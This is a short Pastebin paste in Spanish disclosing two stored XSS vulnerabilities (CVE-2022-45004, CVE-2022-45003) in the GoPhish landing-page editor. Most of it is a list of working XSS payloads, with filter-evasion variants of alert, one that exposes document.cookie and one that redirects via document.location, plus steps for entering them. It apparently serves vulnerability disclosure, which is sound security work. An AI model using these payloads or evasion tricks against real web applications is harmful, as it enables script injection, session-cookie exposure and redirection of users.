Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- La vulnerabilidad se encuentra en la última versión y anteriores de GoPhish (https://github.com/gophish/gophish).
- CVE: CVE-2022-45004
- Para explotar la vulnerabilidad es necesario descargar la herramienta y crear una nueva "LANDING PAGE".
- > Introducir uno a uno los siguientes payloads:
- onMouseOver=<script>alert("/XSS BY Y000!/")</script>
- <input onblur=top[/al/.source+/ert/.source]("_Y00!_") autofocus><input autofocus>
- <input onblur=["_Y00!_"].find(alert) autofocus><input autofocus>
- <input onblur=(((confirm)))("_Y00!_") autofocus><input autofocus>
- <form><button formaction=javascript:alert('xss_by_Y000!')>_Y000!_
- <Img src="/" =_=" title=" onerror='prompt(document.cookie)'">
- CVE-2022-45003
- Para explotar la vulnerabilidad es necesario descargar la herramienta y crear una nueva "LANDING PAGE".
- > Introducir el siguiente payload:
- " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=``;alert`_Y000!_`//>
- Vulnerability Discover: Mikel Hernández Alonso
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement